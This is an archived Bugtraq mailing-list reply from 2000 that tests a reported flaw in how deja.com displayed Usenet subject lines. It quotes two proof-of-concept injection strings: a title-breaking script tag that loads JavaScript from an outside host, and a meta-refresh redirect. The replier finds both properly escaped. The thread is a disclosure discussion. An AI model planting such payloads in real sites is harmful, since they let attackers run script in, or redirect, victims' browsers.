[14341] in bugtraq
Re: Malicious-HTML vulnerabilities at deja.com
daemon@ATHENA.MIT.EDU (Geert Altena)
Mon Mar 20 04:37:26 2000
Mail-Followup-To: Niall Smart <niall@POBOX.COM>, BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <20000317123145.A11540@uttnarag.arago>
Date: Fri, 17 Mar 2000 12:31:46 +0100
Reply-To: Geert Altena <geert@uttnarag.tn.utwente.nl>
From: Geert Altena <geert@UTTNARAG.TN.UTWENTE.NL>
X-To: Niall Smart <niall@POBOX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <38CFC424.BB4707A8@pobox.com>; from niall@POBOX.COM on Fri,
Mar 17, 2000 at 12:06:21PM +0100
You, Niall Smart, <niall@POBOX.COM>, wrote:
> deja.com does not always escape meta-characters when displaying
^^^^^^^^^^
> Usenet articles. Specifically, the article view page
> (http://www.deja.com/getdoc.xp) and the thread view page
> (http://www.deja.com/viewthread.xp) display the subject of the
> article "as is" between title tags.
>
> Examples
> ========
>
> JavaScript popup:
>
> http://www.deja.com/getdoc.xp?AN=591804116
Comes out as (copy/paste from netscape):
------------
>> Forum: alt.test
>> Thread: </title><script
>> src="http://www.in-design.com/~nsmart/foo.js"></script><body
>> onLoad="return bar()">
>> Message 1 of 1
Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js">
</script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <regkey@yahoo.com>
--------------
I have javascript enabled, no popup.
> Redirection using meta tag:
>
> http://www.deja.com/getdoc.xp?AN=591833344
Comes out as:
-----------------
>> Forum: alt.test
>> Thread: </title><meta http-equiv="refresh"
content="0;url=http://www.in-design.com/~nsmart/deja.html">
>> Message 1 of 1
Subject: </title><meta http-equiv="refresh"
content="0;url=http://www.in-design.com/~nsmart/deja.html">
Date: 03/01/2000
Author: regkey <regkey@yahoo.com>
--------------------
No redirection here to www.in-design.com.
Looking at the source, in both cases (javascript and meta rerefresh) the
"<" and ">" are properly replaced by "<" and ">" eliminating the
vulnerabilities you mentioned. Same thing applies then I get the article
via powersearch.
So either someone at Deja reads Bugtraq and did a fix before this reply or
this is a case where things _are_ properly escaped.
Cheers,
\Geert.
--
Geert Altena | Geert@uttnarag.tn.utwente.nl | Coffee, black, no sugar
Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
Prediction is difficult, especially of the future. - (Niels Bohr)
